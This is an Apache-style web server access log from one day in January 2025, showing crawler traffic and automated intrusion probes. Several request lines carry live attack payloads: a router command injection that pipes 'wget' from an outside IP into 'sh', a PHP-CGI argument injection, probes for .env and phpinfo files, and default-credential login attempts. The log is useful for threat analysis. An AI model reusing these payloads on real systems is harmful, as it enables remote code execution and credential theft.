156.59.198.135 - - [09/Jan/2025:01:02:24 +0100] "GET /renault.2web.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.251.78.46 - - [09/Jan/2025:01:03:58 +0100] "GET /phpinfo.php HTTP/1.1" 200 10502 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
156.59.198.135 - - [09/Jan/2025:01:09:51 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104211103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [09/Jan/2025:01:10:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.90.160.171 - - [09/Jan/2025:01:13:38 +0100] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Opera/8.26.(X11; Linux x86_64; af-ZA) Presto/2.9.188 Version/10.00"
156.59.198.136 - - [09/Jan/2025:01:13:52 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109060903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.202.9.133 - - [09/Jan/2025:01:15:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
156.59.198.135 - - [09/Jan/2025:01:17:52 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102260903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.55 - - [09/Jan/2025:01:19:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [09/Jan/2025:01:21:52 +0100] "GET /docs/contadino/ANGEBOT/AG17-000005.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [09/Jan/2025:01:27:26 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
83.222.191.146 - - [09/Jan/2025:01:35:00 +0100] "GET / HTTP/1.0" 200 274 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
4.151.38.164 - - [09/Jan/2025:01:39:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
59.2.104.207 - - [09/Jan/2025:01:41:52 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
31.43.185.66 - - [09/Jan/2025:01:42:52 +0100] "\x03" 400 383 "-" "-"
91.223.3.201 - - [09/Jan/2025:01:43:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [09/Jan/2025:01:49:42 +0100] "GET /renault.2web.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:02:14:32 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgb8_t_bk.png HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.21.243.30 - - [09/Jan/2025:02:14:47 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [09/Jan/2025:02:41:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908161703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.169.206.211 - - [09/Jan/2025:02:44:40 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [09/Jan/2025:02:56:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105051103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:03:00:22 +0100] "GET /renault.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:03:04:22 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00020.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:03:08:23 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00018.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:03:12:23 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00003.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
206.168.34.58 - - [09/Jan/2025:03:16:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
206.168.34.58 - - [09/Jan/2025:03:16:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.58 - - [09/Jan/2025:03:16:14 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.58 - - [09/Jan/2025:03:16:17 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.58 - - [09/Jan/2025:03:16:19 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
185.82.219.124 - - [09/Jan/2025:03:17:13 +0100] "GET /.env HTTP/1.0" 404 359 "-" "Mozilla/5.0 (Windows NT 6.0; rv:40.0) Gecko/20100101 Firefox/40.0"
31.220.1.144 - - [09/Jan/2025:03:18:43 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
185.16.39.104 - - [09/Jan/2025:03:31:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.121.200 - - [09/Jan/2025:03:32:24 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [09/Jan/2025:03:33:14 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
47.128.20.118 - - [09/Jan/2025:03:36:27 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
135.148.10.175 - - [09/Jan/2025:03:38:40 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
15.204.37.92 - - [09/Jan/2025:03:46:03 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
47.128.45.200 - - [09/Jan/2025:03:48:26 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.34.212.75 - - [09/Jan/2025:03:49:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [09/Jan/2025:03:52:26 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image121.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:03:56:26 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00004.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.38.23.18 - - [09/Jan/2025:03:56:30 +0100] "GET /admin/elfinder/php/connector.php HTTP/1.1" 404 397 "-" "ALittle Client"
194.38.23.18 - - [09/Jan/2025:03:56:33 +0100] "GET /admin/elfinder/php/connector.php HTTP/1.1" 404 384 "-" "ALittle Client"
47.128.52.142 - - [09/Jan/2025:04:00:26 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.153.77.181 - - [09/Jan/2025:04:27:26 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.153.77.181 - - [09/Jan/2025:04:27:27 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
213.32.32.86 - - [09/Jan/2025:04:30:56 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
213.32.32.84 - - [09/Jan/2025:04:30:56 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
213.32.32.86 - - [09/Jan/2025:04:34:06 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
121.169.122.171 - - [09/Jan/2025:04:40:13 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
172.168.41.228 - - [09/Jan/2025:04:49:09 +0100] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x"
184.105.247.195 - - [09/Jan/2025:05:16:00 +0100] "\x16\x03\x01" 400 383 "-" "-"
31.220.1.144 - - [09/Jan/2025:05:18:33 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
179.43.191.146 - - [09/Jan/2025:05:18:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [09/Jan/2025:05:19:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912131603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [09/Jan/2025:05:24:55 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
157.65.34.52 - - [09/Jan/2025:05:28:32 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
45.156.129.54 - - [09/Jan/2025:05:33:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.131 - - [09/Jan/2025:05:34:00 +0100] "GET /css/images/PTZOptics_powerby.png HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
80.82.77.202 - - [09/Jan/2025:05:45:23 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
147.45.112.17 - - [09/Jan/2025:05:48:59 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [09/Jan/2025:05:59:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106251203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:06:03:20 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00015.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
162.216.150.127 - - [09/Jan/2025:06:05:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
179.43.191.146 - - [09/Jan/2025:06:05:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [09/Jan/2025:06:07:20 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00010.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:06:11:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008181203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [09/Jan/2025:06:11:31 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
156.59.198.135 - - [09/Jan/2025:06:15:20 +0100] "GET /docs/contadino/2017/GS17-000004.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.223.205.208 - - [09/Jan/2025:06:17:48 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 7.1.2; FP2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Mobile Safari/537.36"
159.223.205.208 - - [09/Jan/2025:06:19:05 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
156.59.198.136 - - [09/Jan/2025:06:21:45 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00005.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [09/Jan/2025:06:50:18 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [09/Jan/2025:06:50:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110281703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
106.156.187.43 - - [09/Jan/2025:06:52:32 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [09/Jan/2025:06:54:58 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00009.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.34.212.75 - - [09/Jan/2025:06:56:46 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [09/Jan/2025:06:59:13 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image050.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:07:06:09 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00002.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
221.145.246.86 - - [09/Jan/2025:07:07:33 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
174.83.22.126 - - [09/Jan/2025:07:13:59 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
195.3.223.55 - - [09/Jan/2025:07:17:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [09/Jan/2025:07:26:43 +0100] "GET /renault.2web.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.198 - - [09/Jan/2025:07:29:27 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
66.240.236.109 - - [09/Jan/2025:07:42:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [09/Jan/2025:08:19:46 +0100] "GET /docs/contadino/2017/GS17-000006.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:08:23:46 +0100] "GET /renault.2web.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:08:27:46 +0100] "GET /renault.2web.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:08:31:46 +0100] "GET /docs/contadino/2017/GS17-000002.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:08:35:46 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray16a_bk.png HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.104 - - [09/Jan/2025:08:44:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
117.235.120.15 - - [09/Jan/2025:08:45:53 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 378 "-" "-"
87.121.79.3 - - [09/Jan/2025:08:48:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.104 - - [09/Jan/2025:08:52:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.104 - - [09/Jan/2025:08:52:41 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [09/Jan/2025:08:56:59 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00019.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [09/Jan/2025:08:58:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
134.209.215.189 - - [09/Jan/2025:09:02:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
134.209.215.189 - - [09/Jan/2025:09:02:09 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
156.59.198.135 - - [09/Jan/2025:09:04:35 +0100] "GET /renault.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:09:08:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909181003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:09:12:34 +0100] "GET /docs/ecommlogistics/belege/RE2016.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.205.163.236 - - [09/Jan/2025:09:13:57 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
87.120.112.187 - - [09/Jan/2025:09:14:41 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (iPad; CPU OS 10_0 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/14A5335b Safari/601.1.46"
45.164.178.160 - - [09/Jan/2025:09:18:08 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 378 "-" "-"
59.26.182.43 - - [09/Jan/2025:09:24:19 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
91.223.3.201 - - [09/Jan/2025:09:31:22 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.146.53 - - [09/Jan/2025:09:39:11 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.53 - - [09/Jan/2025:09:39:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [09/Jan/2025:09:39:14 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [09/Jan/2025:09:39:14 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [09/Jan/2025:09:39:15 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [09/Jan/2025:09:44:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108181403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Jan/2025:09:48:40 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image117.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Jan/2025:09:56:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002071603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.252 - - [09/Jan/2025:10:00:02 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
167.71.116.63 - - [09/Jan/2025:10:00:03 +0100] "\x16\x03\x01" 400 383 "-" "-"
167.71.116.63 - - [09/Jan/2025:10:00:04 +0100] "\x16\x03\x01" 400 383 "-" "-"
167.71.116.63 - - [09/Jan/2025:10:00:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.116.63 - - [09/Jan/2025:10:00:04 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
167.71.116.63 - - [09/Jan/2025:10:00:05 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
167.71.116.63 - - [09/Jan/2025:10:00:05 +0100] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
167.71.116.63 - - [09/Jan/2025:10:00:05 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.116.63 - - [09/Jan/2025:10:00:06 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.116.63 - - [09/Jan/2025:10:00:06 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
